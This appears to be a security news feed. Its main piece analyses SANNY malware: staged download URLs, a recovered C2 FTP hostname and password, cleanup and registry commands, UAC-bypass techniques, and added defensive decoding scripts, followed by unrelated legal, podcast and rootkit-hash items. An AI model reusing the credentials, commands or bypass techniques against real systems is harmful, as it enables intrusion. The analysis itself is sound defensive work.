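The fake-certificate trick works because certutil's decode mode strips the BEGIN/END markers and base64-decodes whatever sits between them, without caring whether the result is a certificate. A defender triaging such a file can apply the check certutil does not: a genuine certificate decodes to DER, which begins with an ASN.1 SEQUENCE tag (0x30) and a length covering the rest of the buffer, whereas a batch script decodes to plain text. The following is an added example, not FireEye's detection logic or any content from the campaign; the sample files are constructed inline, and the list of batch-command hints is an assumption.

```python
"""Triage a PEM-looking file before trusting it as a certificate.

certutil -decode strips the BEGIN/END markers and base64-decodes whatever
sits between them, so a batch script wrapped in PEM armour decodes exactly
like a real certificate would.  A genuine certificate decodes to DER: an
ASN.1 SEQUENCE tag (0x30) followed by a length that covers the rest of the
buffer.  The classifier below applies that structural check and, when the
payload is text instead, looks for batch-script commands.  Samples are
constructed here; the checks are an added example, not FireEye's logic.
"""
import base64
import re

PEM_RE = re.compile(
    r"-----BEGIN (?P<label>[A-Z ]+)-----\s*"
    r"(?P<body>[A-Za-z0-9+/=\s]*?)\s*"
    r"-----END (?P=label)-----",
    re.S,
)
# Assumed set of commands whose presence at line start marks a batch script.
BATCH_HINT_RE = re.compile(
    r"^\s*(@?echo|set|start|copy|rundll32|wusa|certutil|cmd)\b", re.I | re.M
)


def pem_payload(text):
    """Return the decoded bytes between the first BEGIN/END pair, or None."""
    m = PEM_RE.search(text)
    if not m:
        return None
    body = "".join(m.group("body").split())
    try:
        return base64.b64decode(body, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def looks_like_der(data):
    """True if data is one complete DER-encoded SEQUENCE (as an X.509
    certificate is).  This checks structure only, not certificate contents."""
    if len(data) < 2 or data[0] != 0x30:
        return False
    first = data[1]
    if first < 0x80:                      # short-form length
        length, header = first, 2
    else:                                 # long form: 0x8N then N length bytes
        n = first & 0x7F
        if n == 0 or n > 4 or len(data) < 2 + n:
            return False
        length, header = int.from_bytes(data[2:2 + n], "big"), 2 + n
    return header + length == len(data)


def classify(text):
    """'not-pem', 'der-sequence', 'binary-payload', 'batch-script' or 'text-payload'."""
    data = pem_payload(text)
    if data is None:
        return "not-pem"
    if looks_like_der(data):
        return "der-sequence"
    try:
        decoded = data.decode("ascii")
    except UnicodeDecodeError:
        return "binary-payload"
    return "batch-script" if BATCH_HINT_RE.search(decoded) else "text-payload"


def wrap_as_pem(payload, label="CERTIFICATE"):
    """Build PEM armour around arbitrary bytes (used here only to make samples)."""
    b64 = base64.b64encode(payload).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return f"-----BEGIN {label}-----\n" + "\n".join(lines) + f"\n-----END {label}-----\n"


# Constructed samples: a harmless batch file in certificate armour, and a
# minimal DER SEQUENCE (containing INTEGER 5) standing in for a real body.
FAKE_CERT = wrap_as_pem(b"@echo off\r\necho constructed sample\r\n")
DER_SAMPLE = wrap_as_pem(bytes([0x30, 0x03, 0x02, 0x01, 0x05]))

if __name__ == "__main__":
    for name, sample in [("fake", FAKE_CERT), ("der", DER_SAMPLE)]:
        print(name, classify(sample))
```

The structural check is cheap enough to run on every PEM-looking file fetched by a process that should not be fetching certificates, and a `batch-script` or `text-payload` verdict is the case to escalate.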
BAT File Analysis
Once decoded and executed, the BAT file from Stage 1 will download an encoded CAB file from the base URL: hxxp://more.1apps[.]com/. The exact file name downloaded is based on the architecture of the operating system.
- For a 32-bit operating system: hxxp://more.1apps[.]com/2.txt
- For a 64-bit operating system: hxxp://more.1apps[.]com/3.txt
Similarly, based on Windows operating system version and architecture, the CAB file is installed using different techniques. For Windows 10, the BAT file uses rundll32 to invoke the appropriate function from update.dll (component inside setup.cab).
- For a 32-bit operating system: rundll32 update.dll _EntryPoint@16
- For a 64-bit operating system: rundll32 update.dll EntryPoint
For other versions of Windows, the CAB file is extracted using the legitimate Windows Update Standalone Installer (wusa.exe) directly into the system directory:
The BAT file also checks for the presence of Kaspersky Lab Antivirus software on the machine. If found, CAB installation is changed accordingly in an attempt to bypass detection:
Stage 2: CAB File Analysis
As described in the previous section, the BAT file will download the CAB file based on the architecture of the underlying operating system. The rest of the malicious activities are performed by the downloaded CAB file.
The CAB file contains the following components:
- install.bat – BAT file used to deploy and execute the components.
- ipnet.dll – Main component that we refer to as SANNY malware.
- ipnet.ini – Config file used by SANNY malware.
- NTWDBLIB.dll – Performs UAC bypass on Windows 7 (32-bit and 64-bit).
- update.dll – Performs UAC bypass on Windows 10.
install.bat will perform the following essential activities:
- Checks the current execution directory of the BAT file. If it is not the Windows system directory, then it will first copy the necessary components (ipnet.dll and ipnet.ini) to the Windows system directory before continuing execution:
- Hijacks a legitimate Windows system service, COMSysApp (COM+ System Application), by first stopping this service and then modifying the appropriate Windows service registry keys to ensure that the malicious ipnet.dll will be loaded when the COMSysApp service is started:
- After the hijacked COMSysApp service is started, it will delete all remaining components of the CAB file:
ipnet.dll is the main component inside the CAB file that is used for performing malicious activities. This DLL exports the following two functions:
- ServiceMain – Invoked when the hijacked system service, COMSysApp, is started.
- Post – Used to perform data exfiltration to the command and control (C2) server using FTP protocol.
The ServiceMain function first performs a check to see if it is being run in the context of svchost.exe or rundll32.exe. If it is being run in the context of svchost.exe, then it will first start the system service before proceeding with the malicious activities. If it is being run in the context of rundll32.exe, then it performs the following activities:
- Deletes the module NTWDBLIB.DLL from the disk using the following command:
cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL
- Sets the code page on the system to 65001, which corresponds to UTF-8:
cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f
Command and Control (C2) Communication
SANNY malware uses the FTP protocol as the C2 communication channel.
FTP Config File
The FTP configuration information used by SANNY malware is encoded and stored inside ipnet.ini.
This file is Base64 encoded using the following custom character set: SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8
Upon decoding the file, the following credentials can be recovered:
- FTP Server: ftp.capnix[.]com
- Username: cnix_21072852
- Password: vlasimir2017
It then connects to the FTP server decoded from the config file and sets the current directory on the FTP server to “htdocs” using the FtpSetCurrentDirectoryW function.
System Information Collection
For reconnaissance purposes, SANNY malware executes commands on the system to collect information, which is sent to the C2 server.
System information is gathered from the machine using the following command:
The list of running tasks on the system is gathered by executing the following command:
C2 Commands
After successful connection to the FTP server decoded from the configuration file, the malware searches for a file containing the substring “to everyone” in the “htdocs” directory. This file will contain C2 commands to be executed by the malware.
Upon discovery of the file with the “to everyone” substring, the malware downloads the file and then performs actions based on the following command names:
- chip command: This command deletes the existing ipnet.ini configuration file from the file system and creates a new ipnet.ini file with a specified configuration string. The chip command allows the attacker to migrate the malware to a new FTP C2 server. The command has the following syntax:
- pull command: This command is used for the purpose of data exfiltration. It has the ability to upload an arbitrary file from the local filesystem to the attacker’s FTP server. The command has the following syntax:
The uploaded file is compressed and encrypted using the routine described later in the Compression and Encoding Data section.
- put command: This command is used to copy an existing file on the system to a new location and delete the file from the original location. The command has the following syntax:
- default command: If the command begins with the substring “cmd /c”, but it is not followed by either of the previous commands (chip, pull, and put), then it directly executes the command on the machine using WinExec.
- /user command: This command will execute a command on the system as the logged-in user. The command duplicates the access token of “explorer.exe” and spawns a process using the following steps:
- Enumerates the running processes on the system to search for the explorer.exe process and obtain the process ID of explorer.exe.
- Obtains the access token for the explorer.exe process with the access flags set to 0x000F01FF.
- Starts the application (defined in the C2 command) on the system by calling the CreateProcessAsUser function and using the access token obtained in Step 2.
C2 Command | Purpose |
---|---|
chip | Update the FTP server config file |
pull | Upload a file from the machine |
put | Copy an existing file to a new destination |
/user | Create a new process with explorer.exe access token |
default command | Execute a program on the machine using WinExec() |
Compression and Encoding Data
SANNY malware uses an interesting mechanism for compressing the data collected from the system and encoding it before exfiltration. Instead of using an archiving utility, the malware leverages the Shell.Application COM object and calls the CopyHere method of the IShellDispatch interface to perform compression as follows:
- Creates an empty ZIP file with the name: temp.zip in the %temp% directory.
- Writes the first 16 bytes of the PK header to the ZIP file.
- Calls the CopyHere method of IShellDispatch interface to compress the collected data and write to temp.zip.
- Reads the contents of temp.zip to memory.
- Deletes temp.zip from the disk.
- Creates an empty file, post.txt, in the %temp% directory.
- The temp.zip file contents are Base64 encoded (using the same custom character set mentioned in the previous FTP Config File section) and written to the file: %temp%\post.txt.
- Calls the FtpPutFileW function to write the contents of post.txt to the remote file with the format: “from <computer_name_timestamp>.txt”
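The custom Base64 alphabet is shared by the ipnet.ini config file (FTP Config File section) and by the post.txt payload described in this section, so one decoder serves both. The Python below is an added example for analysts, not code from the malware or from FireEye. It maps the custom table onto the standard alphabet and lets the standard library do the decoding. The write-up quotes 65 characters; which of them serves as the padding symbol is not stated, and the code assumes the 65th ('8') plays that role, the usual layout of a 65-entry table, while taking the table as a parameter so it can be changed if a sample shows otherwise. The configuration text used in the demonstration is constructed placeholder data, not the credentials recovered in the write-up, and guess_table is a rough triage heuristic of my own.

```python
import base64

# Custom table quoted in the write-up: 65 symbols. Assumption: the first 64 are the data
# symbols in value order and the 65th ('8') is the padding character.
SANNY_TABLE = "SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8"
STD_TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="


def _check_table(table):
    if len(table) != 65 or len(set(table)) != 65:
        raise ValueError("expected 65 distinct symbols (64 data symbols plus padding)")


def decode_custom_b64(text, table=SANNY_TABLE):
    """Decode text written in a custom Base64 table into bytes."""
    _check_table(table)
    # keep only table symbols so line breaks or stray whitespace do not break decoding
    cleaned = "".join(ch for ch in text if ch in table)
    std = cleaned.translate(str.maketrans(table, STD_TABLE))
    std += "=" * (-len(std) % 4)        # tolerate samples that omit padding
    return base64.b64decode(std)


def encode_custom_b64(raw, table=SANNY_TABLE):
    """Inverse of decode_custom_b64; handy for building test vectors."""
    _check_table(table)
    std = base64.b64encode(raw).decode("ascii")
    return std.translate(str.maketrans(STD_TABLE, table))


def _printable_ratio(raw):
    if not raw:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in raw) / len(raw)


def guess_table(text):
    """Rough triage: does the blob decode to text under the SANNY table or the standard one?"""
    scores = {}
    for label, table in (("custom", SANNY_TABLE), ("standard", STD_TABLE)):
        try:
            scores[label] = _printable_ratio(decode_custom_b64(text, table))
        except ValueError:                  # binascii.Error is a ValueError subclass
            scores[label] = 0.0
    if scores["custom"] >= 0.95 and scores["standard"] < 0.95:
        return "custom"
    if scores["standard"] >= 0.95 and scores["custom"] < 0.95:
        return "standard"
    return "unknown"


# Constructed config text (placeholder values, not the credentials from the write-up)
SAMPLE_CONFIG = b"ftp.example.invalid\r\nuser_placeholder\r\npass_placeholder\r\n"


def roundtrip_demo():
    """Encode the constructed config with the SANNY table and decode it again."""
    encoded = encode_custom_b64(SAMPLE_CONFIG)
    return encoded, decode_custom_b64(encoded)


if __name__ == "__main__":
    enc, dec = roundtrip_demo()
    print("custom-encoded:", enc)
    print("decoded       :", dec.decode())
    print("table guess   :", guess_table(enc))
```

Because the mapping is a pure character translation, a wrong padding assumption only affects trailing bytes of inputs whose length is not a multiple of three; if a real ipnet.ini sample decodes with garbage at the very end, swapping the padding symbol is the first thing to try.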
Execution on Windows 7 and User Account Control (UAC) Bypass
NTWDBLIB.dll – This component from the CAB file will be extracted to the %windir%\system32 directory. After this, the cliconfg command is executed by the BAT file.
The purpose of this DLL module is to launch the install.bat file. The file cliconfg.exe is a legitimate Windows binary (SQL Client Configuration Utility) that loads the library NTWDBLIB.dll upon execution. Placing a malicious copy of NTWDBLIB.dll in the same directory as cliconfg.exe is a technique known as DLL side-loading, and here it results in a UAC bypass.
Execution on Windows 10 and UAC Bypass
Update.dll – This component from the CAB file is used to perform UAC bypass on Windows 10. As described in the BAT File Analysis section, if the underlying operating system is Windows 10, then it uses update.dll to begin the execution of code instead of invoking the install.bat file directly.
The main actions performed by update.dll are as follows:
- Executes the following commands to set up the Windows registry for UAC bypass:
- Leverages a UAC bypass technique that uses the legitimate Windows binary, fodhelper.exe, to perform the UAC bypass on Windows 10 so that the install.bat file is executed with elevated privileges:
- Creates an additional BAT file, kill.bat, in the current directory to delete evidence of the UAC bypass. The BAT file kills the current process and deletes the components update.dll and kill.bat from the file system:
Conclusion
This activity shows us that the threat actors using SANNY malware are evolving their malware delivery methods, notably by incorporating UAC bypasses and endpoint evasion techniques. By using a multi-stage attack with a modular architecture, the malware authors increase the difficulty of reverse engineering and potentially evade security solutions.
Users can protect themselves from such attacks by disabling Office macros in their settings and practicing vigilance when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.
Indicators of Compromise
SHA256 Hash | Original Filename |
---|---|
b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4 | РГНФ 2018-2019.doc |
e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1 | Copy of communication from Security Council Committee (1718).doc |
eb394523df31fc83aefa402f8015c4a46f534c0a1f224151c47e80513ceea46f | 1.bat |
a2e897c03f313a097dc0f3c5245071fbaeee316cfb3f07785932605046697170 | Setup.cab (64-bit) |
a3b2c4746f471b4eabc3d91e2d0547c6f3e7a10a92ce119d92fa70a6d7d3a113 | Setup.cab (32-bit) |
South Dakota Enacts Breach Notification Law
As reported in BNA Privacy Law Watch, on March 21, 2018, South Dakota enacted the state’s first data breach notification law. The law will take effect on July 1, 2018, and includes several key provisions:
- Definitions of Personal Information and Protected Information. The law defines personal information as a person’s first name or first initial and last name in combination with any one or more of the following data elements: (1) Social Security Number; (2) driver’s license number or other unique identification number created or collected by a government body; (3) account, credit card or debit card number, in combination with any required security code, access code, password, routing number, PIN or any additional information that would permit access to a person’s financial account; (4) health information; and (5) an identification number assigned to a person by the person’s employer in combination with any required security code, access code, password, or biometric data generated from measurements or analysis of human body characteristics for authentication purposes. The law further defines “protected information” as (1) a username or email address in combination with a password, security question answer, or other information that permits access to an online account; and (2) account number or credit or debit card number, in combination with any required security code, access code, or password that permits access to a person’s financial account. Notably, the definition of “protected information” does not include a person’s name.
- Breach Notification Requirement. The law requires notification to affected individuals (and, in certain circumstances, the Attorney General, as explained below) in the event of unauthorized acquisition of unencrypted computerized data (or encrypted computerized data and the encryption key) by any person that materially compromises the security, confidentiality or integrity of personal information or protected information.
- Content and Method of Notice. The law does not contain content requirements for the notice. Notice may be provided (1) in writing; (2) electronically, if the notice is consistent with the provisions of E-SIGN; or (3) via substitute notice if the cost of providing notice would exceed $250,000, the number of affected individuals exceeds 500,000, or the entity does not have sufficient contact information for affected individuals. Substitute notice must consist of (1) email notice, if the entity has an email address for affected individuals; (2) conspicuous posting on the entity’s website; and (3) notification to statewide media.
- Timing. Notification to affected individuals is required within 60 days of discovery of the breach.
- Harm Threshold. The law contains a harm threshold, pursuant to which notification is not required if, following an appropriate investigation and notice to the Attorney General, the entity reasonably determines that the breach will not likely result in harm to the affected person(s).
- Notice to the Attorney General. The law requires notification to the Attorney General of any breach that exceeds 250 South Dakota residents.
- Notice to the Consumer Reporting Agencies. In the event notification to affected individuals is required, the law also requires notification to the nationwide consumer reporting agencies of the timing, distribution and content of the notice to individuals.
- Penalties for Non-Compliance. A violation of the breach notification law is considered a deceptive act under the state’s consumer protection laws. The South Dakota Attorney General noted that this violation has the effect of creating a private right of action. In addition, the Attorney General is authorized to enforce the breach notification law and may impose a fine of up to $10,000 per day per violation.
With this enactment, Alabama remains the sole U.S. state without a breach notification law.
DOSfuscation: Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques
Skilled attackers continually seek out new attack vectors, while employing evasion techniques to maintain the effectiveness of old vectors, in an ever-changing defensive landscape. Many of these threat actors employ obfuscation frameworks for common scripting languages such as JavaScript and PowerShell to thwart signature-based detections of common offensive tradecraft written in these languages.
However, as defenders' visibility into these popular scripting languages increases through better logging and defensive tooling, some stealthy attackers have shifted their tradecraft to languages that do not support this additional visibility. At a minimum, determined attackers are adding dashes of simple obfuscation to previously detected payloads and commands to break rigid detection rules.
In this DOSfuscation white paper, first presented at Black Hat Asia 2018, I showcase nine months of research into several facets of command line argument obfuscation that affect static and dynamic detection approaches. Beginning with cataloguing a half-dozen characters with significant obfuscation capabilities (only two of which I have identified being used in the wild), I then highlight the static detection evasion capabilities of environment variable substring encoding. Combining these techniques, I unveil four never-before-seen payload obfuscation approaches that are fully compatible with any input command on cmd.exe's command line. These obfuscation capabilities de-obfuscate in the current cmd.exe session for both interactive and noninteractive sessions, and avoid all command line logging. Finally, I discuss the building blocks required for these new encoding and obfuscation capabilities and outline several approaches that defenders can take to begin detecting this genre of obfuscation.
As a Senior Applied Security Researcher with FireEye's Advanced Practices Team, I am tasked with researching, developing and deploying new detection capabilities to FireEye's detection platform to stay ahead of advanced threat actors and their ever-changing tactics, techniques and procedures. FireEye customers have been benefiting from multiple layers of innovative obfuscation detection capabilities developed and deployed over the past nine months as a direct result of this research.
Download the DOSfuscation white paper today.
Daniel Bohannon (@danielhbohannon) is a Senior Applied Security Researcher on FireEye's Advanced Practices Team.
Totally Overwhelmed – Business Security Weekly #78
This week, Michael and Paul interview Fred Scholl, President of Monarch Information Networks! Then the articles of discussion and tracking security innovation! All that and more, on this episode of Business Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/BSWEpisode78
Visit https://www.securityweekly.com/bsw for all the latest episodes!
I’m A Tiger – Enterprise Security Weekly #84
This week, John Strand takes the show by the reins and conducts an outstanding interview with Brian Honan, who is recognised internationally as an expert on cybersecurity! John also gives a tech segment on how enterprises defend against attacks! All that and more, here on Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode84
Ninth Circuit Reverses District Court Decision in Zappos Consumer Data Breach Case
On March 8, 2018, the Ninth Circuit Court of Appeals (“Ninth Circuit”) reversed a decision from the United States District Court for the District of Nevada. The trial court found that one subclass of plaintiffs in In re Zappos.Com, Inc. Customer Data Security Breach Litigation, had not sufficiently alleged injury in fact to establish Article III standing. The opinion focused on consumers who did not allege that any fraudulent charges had been made using their identities, despite hackers accessing their names, account numbers, passwords, email addresses, billing and shipping addresses, telephone numbers, and credit and debit card information in a 2012 data breach.
As a threshold matter, this was the first occasion the Ninth Circuit had to find that its 2010 data breach standing precedent in Krottner v. Starbucks could be reconciled with the U.S. Supreme Court’s 2013 decision in Clapper v. Amnesty International. In Krottner, the Ninth Circuit found that the theft of a laptop containing consumers’ personally identifying information raised a “credible threat of real and immediate harm.” In Clapper, the U.S. Supreme Court held that the “objectively reasonable likelihood” that plaintiffs’ communications would be swept up in FISA surveillance did not rise to the level of a “certainly impending injury” necessary to establish Article III standing.
The Ninth Circuit noted the series of inferences alleged by the Clapper plaintiffs, where none of their communications had yet been intercepted, much less under the specific statute that plaintiffs were challenging. In Krottner, however, the thief had acquired all of the information necessary to steal the plaintiffs’ identities once he or she accessed the stolen laptop. Similarly, in In re Zappos, the Ninth Circuit reasoned that plaintiffs had alleged that hackers had accessed enough data to enable the hackers to steal their identities.
The Ninth Circuit left open the possibility that plaintiffs might not be able to present sufficient evidence to support standing at summary judgment. But it joined a growing list of federal circuit courts finding that Article III standing in consumer data breach litigation can be “based on the hacking incident itself, not any subsequent illegal activity.”
AV18-049: Citrix Security Updates
WiTopia personalVPN review: It’s all about choices
WiTopia personalVPN in brief:
- P2P allowed: Yes
- Business location: Reston, VA
- Number of servers: 300+
- Number of country locations: 45
- Cost: $50 (Basic) / $70 (Pro)
- VPN protocol: OpenVPN (default)
- Data encryption: AES-128
- Data authentication: SHA2
- Handshake encryption: TLSv1.2
I’ve grown to expect certain things from a VPN service: a nice-looking and easy-to-use desktop program, and extra features like double VPNs, dedicated torrent servers, or sometimes Netflix compatibility. PersonalVPN from WiTopia confounds all those expectations a little, but is still a great option to consider.
Never Tag Your Mom On Facebook If She Displays Her Maiden Name
Diving Into the Dark Web and Understanding the Economy Powering Cyber Attacks
This morning, Armor, a cloud security provider, released a great report into the cyber crime black market. Armor was formerly known as FireHost – they were one of the leading hosts...
The post Diving Into the Dark Web and Understanding the Economy Powering Cyber Attacks appeared first on PerezBox.
Trump’s Connection To Cambridge Analytica
AV18-048: Mozilla Security Updates
Personal Information Of 880,000 Orbitz Customers Likely Breached
Supplementing the Limitations in Office 365
Office 365 is second to none in enterprise productivity and collaborative tools, but its security capabilities leave a lot to be desired. Osterman Research outlines how to improve Office 365 security.
Richard Thomas Selected as Chair for Guernsey’s New Data Protection Authority
Hunton & Williams LLP is pleased to announce that Richard Thomas, Global Strategy Advisor to the Centre for Information Policy Leadership (“CIPL”), has been selected as Chair for the Bailiwick of Guernsey’s new data protection authority. Adding the appointment to his position at CIPL, Thomas will be formally appointed in May and will work with the Data Protection Commissioner and the States of Guernsey to support the island’s regulatory framework in conjunction with the introduction of its new data protection law. Thomas will work on a shadow basis until his formal appointment, and the role is expected to command between 10 and 15 days per year.
Guernsey previously received a finding of adequacy by the European Commission, permitting transfers between the island and the European Union. The new law seeks to update the data protection regime of the island in line with the EU General Data Protection Regulation and to maintain the determination of adequacy. Supporting this effort, Thomas will provide independent advice to the Guernsey Data Protection Commissioner and will chair a board overseeing the activities of the regulator.
Thomas served as UK Information Commissioner from 2002 to 2009. In January 2018, he was appointed to the UK Advisory Committee on Business Appointments and has received numerous awards for his contributions to the data privacy landscape, including “Privacy Leader of the Year” by the International Association of Privacy Professionals.
Rootkit Umbreon / Umreon – x86, ARM samples

Research: Trend Micro
There are two packages
one is 'found in the wild' full and a set of hashes from Trend Micro (all but one file are already in the full package)
# | File Name | Hash Value | File Size (on Disk) | Duplicate? |
---|---|---|---|---|
1 | .umbreon-ascii | 0B880E0F447CD5B6A8D295EFE40AFA37 | 6085 bytes (5.94 KiB) | |
2 | autoroot | 1C5FAEEC3D8C50FAC589CD0ADD0765C7 | 281 bytes (281 bytes) | |
3 | CHANGELOG | A1502129706BA19667F128B44D19DC3C | 11 bytes (11 bytes) | |
4 | cli.sh | C846143BDA087783B3DC6C244C2707DC | 5682 bytes (5.55 KiB) | |
5 | hideports | D41D8CD98F00B204E9800998ECF8427E | 0 bytes ( bytes) | Yes, of file promptlog |
6 | install.sh | 9DE30162E7A8F0279E19C2C30280FFF8 | 5634 bytes (5.5 KiB) | |
7 | Makefile | 0F5B1E70ADC867DD3A22CA62644007E5 | 797 bytes (797 bytes) | |
8 | portchecker | 006D162A0D0AA294C85214963A3D3145 | 113 bytes (113 bytes) | |
9 | promptlog | D41D8CD98F00B204E9800998ECF8427E | 0 bytes ( bytes) | |
10 | readlink.c | 42FC7D7E2F9147AB3C18B0C4316AD3D8 | 1357 bytes (1.33 KiB) | |
11 | ReadMe.txt | B7172B364BF5FB8B5C30FF528F6C5125 | 2244 bytes (2.19 KiB) | |
12 | setup | 694FFF4D2623CA7BB8270F5124493F37 | 332 bytes (332 bytes) | |
13 | spytty.sh | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes (1011 bytes) | Yes, of file spytty.sh |
14 | umbreon.c | 91706EF9717176DBB59A0F77FE95241C | 1007 bytes (1007 bytes) | |
15 | access.c | 7C0A86A27B322E63C3C29121788998B8 | 713 bytes (713 bytes) | |
16 | audit.c | A2B2812C80C93C9375BFB0D7BFCEFD5B | 1434 bytes (1.4 KiB) | |
17 | chown.c | FF9B679C7AB3F57CFBBB852A13A350B2 | 2870 bytes (2.8 KiB) | |
18 | config.h | 980DEE60956A916AFC9D2997043D4887 | 967 bytes (967 bytes) | |
19 | config.h.dist | 980DEE60956A916AFC9D2997043D4887 | 967 bytes (967 bytes) | Yes, of file config.h |
20 | dirs.c | 46B20CC7DA2BDB9ECE65E36A4F987ABC | 3639 bytes (3.55 KiB) | |
21 | dlsym.c | 796DA079CC7E4BD7F6293136604DC07B | 4088 bytes (3.99 KiB) | |
22 | exec.c | 1935ED453FB83A0A538224AFAAC71B21 | 4033 bytes (3.94 KiB) | |
23 | getpath.h | 588603EF387EB617668B00EAFDAEA393 | 183 bytes (183 bytes) | |
24 | getprocname.h | F5781A9E267ED849FD4D2F5F3DFB8077 | 805 bytes (805 bytes) | |
25 | includes.h | F4797AE4B2D5B3B252E0456020F58E59 | 629 bytes (629 bytes) | |
26 | kill.c | C4BD132FC2FFBC84EA5103ABE6DC023D | 555 bytes (555 bytes) | |
27 | links.c | 898D73E1AC14DE657316F084AADA58A0 | 2274 bytes (2.22 KiB) | |
28 | local-door.c | 76FC3E9E2758BAF48E1E9B442DB98BF8 | 501 bytes (501 bytes) | |
29 | lpcap.h | EA6822B23FE02041BE506ED1A182E5CB | 1690 bytes (1.65 KiB) | |
30 | maps.c | 9BCD90BEA8D9F9F6270CF2017F9974E2 | 1100 bytes (1.07 KiB) | |
31 | misc.h | 1F9FCC5D84633931CDD77B32DB1D50D0 | 2728 bytes (2.66 KiB) | |
32 | netstat.c | 00CF3F7E7EA92E7A954282021DD72DC4 | 1113 bytes (1.09 KiB) | |
33 | open.c | F7EE88A523AD2477FF8EC17C9DCD7C02 | 8594 bytes (8.39 KiB) | |
34 | pam.c | 7A947FDC0264947B2D293E1F4D69684A | 2010 bytes (1.96 KiB) | |
35 | pam_private.h | 2C60F925842CEB42FFD639E7C763C7B0 | 12480 bytes (12.19 KiB) | |
36 | pam_vprompt.c | 017FB0F736A0BC65431A25E1A9D393FE | 3826 bytes (3.74 KiB) | |
37 | passwd.c | A0D183BBE86D05E3782B5B24E2C96413 | 2364 bytes (2.31 KiB) | |
38 | pcap.c | FF911CA192B111BD0D9368AFACA03C46 | 1295 bytes (1.26 KiB) | |
39 | procstat.c | 7B14E97649CD767C256D4CD6E4F8D452 | 398 bytes (398 bytes) | |
40 | procstatus.c | 72ED74C03F4FAB0C1B801687BE200F06 | 3303 bytes (3.23 KiB) | |
41 | readwrite.c | C068ED372DEAF8E87D0133EAC0A274A8 | 2710 bytes (2.65 KiB) | |
42 | rename.c | C36BE9C01FEADE2EF4D5EA03BD2B3C05 | 535 bytes (535 bytes) | |
43 | setgid.c | 5C023259F2C244193BDA394E2C0B8313 | 667 bytes (667 bytes) | |
44 | sha256.h | 003D805D919B4EC621B800C6C239BAE0 | 545 bytes (545 bytes) | |
45 | socket.c | 348AEF06AFA259BFC4E943715DB5A00B | 579 bytes (579 bytes) | |
46 | stat.c | E510EE1F78BD349E02F47A7EB001B0E3 | 7627 bytes (7.45 KiB) | |
47 | syslog.c | 7CD3273E09A6C08451DD598A0F18B570 | 1497 bytes (1.46 KiB) | |
48 | umbreon.h | F76CAC6D564DEACFC6319FA167375BA5 | 4316 bytes (4.21 KiB) | |
49 | unhide-funcs.c | 1A9F62B04319DA84EF71A1B091434C64 | 4729 bytes (4.62 KiB) | |
50 | cryptpass.py | 2EA92D6EC59D85474ED7A91C8518E7EC | 192 bytes (192 bytes) | |
51 | environment.sh | 70F467FE218E128258D7356B7CE328F1 | 1086 bytes (1.06 KiB) | |
52 | espeon-connect.sh | A574C885C450FCA048E79AD6937FED2E | 247 bytes (247 bytes) | |
53 | espeon-shell | 9EEF7E7E3C1BEE2F8591A088244BE0CB | 2167 bytes (2.12 KiB) | |
54 | espeon.c | 499FF5CF81C2624B0C3B0B7E9C6D980D | 14899 bytes (14.55 KiB) | |
55 | listen.sh | 69DA525AEA227BE9E4B8D59ACFF4D717 | 209 bytes (209 bytes) | |
56 | spytty.sh | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes (1011 bytes) | |
57 | ssh-hidden.sh | AE54F343FE974302F0D31776B72D0987 | 127 bytes (127 bytes) | |
58 | unfuck.c | 457B6E90C7FA42A7C46D464FBF1D68E2 | 384 bytes (384 bytes) | |
59 | unhide-self.py | B982597CEB7274617F286CA80864F499 | 986 bytes (986 bytes) | |
60 | listen.sh | F5BD197F34E3D0BD8EA28B182CCE7270 | 233 bytes (233 bytes) |
part 2 (those listed in the Trend Micro article)
# | File Name | Hash Value | File Size (on Disk) |
---|---|---|---|
1 | 015a84eb1d18beb310e7aeeceab8b84776078935c45924b3a10aa884a93e28ac | A47E38464754289C0F4A55ED7BB55648 | 9375 bytes (9.16 KiB) |
2 | 0751cf716ea9bc18e78eb2a82cc9ea0cac73d70a7a74c91740c95312c8a9d53a | F9BA2429EAE5471ACDE820102C5B8159 | 7512 bytes (7.34 KiB) |
3 | 0a4d5ffb1407d409a55f1aed5c5286d4f31fe17bc99eabff64aa1498c5482a5f | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes (1011 bytes) |
4 | 0ce8c09bb6ce433fb8b388c369d7491953cf9bb5426a7bee752150118616d8ff | B982597CEB7274617F286CA80864F499 | 986 bytes (986 bytes) |
5 | 122417853c1eb1868e429cacc499ef75cfc018b87da87b1f61bff53e9b8e8670 | 9EEF7E7E3C1BEE2F8591A088244BE0CB | 2167 bytes (2.12 KiB) |
6 | 409c90ecd56e9abcb9f290063ec7783ecbe125c321af3f8ba5dcbde6e15ac64a | B4746BB5E697F23A5842ABCAED36C914 | 6149 bytes (6 KiB) |
7 | 4fc4b5dab105e03f03ba3ec301bab9e2d37f17a431dee7f2e5a8dfadcca4c234 | D0D97899131C29B3EC9AE89A6D49A23E | 65160 bytes (63.63 KiB) |
8 | 8752d16e32a611763eee97da6528734751153ac1699c4693c84b6e9e4fb08784 | E7E82D29DFB1FC484ED277C702187818 | 55564 bytes (54.26 KiB) |
9 | 991179b6ba7d4aeabdf463118e4a2984276401368f4ab842ad8a5b8b73088522 | 2B1863ACDC0068ED5D50590CF792DF05 | 7664 bytes (7.48 KiB) |
10 | a378b85f8f41de164832d27ebf7006370c1fb8eda23bb09a3586ed29b5dbdddf | A977F68C59040E40A822C384D1CEDEB6 | 176 bytes (176 bytes) |
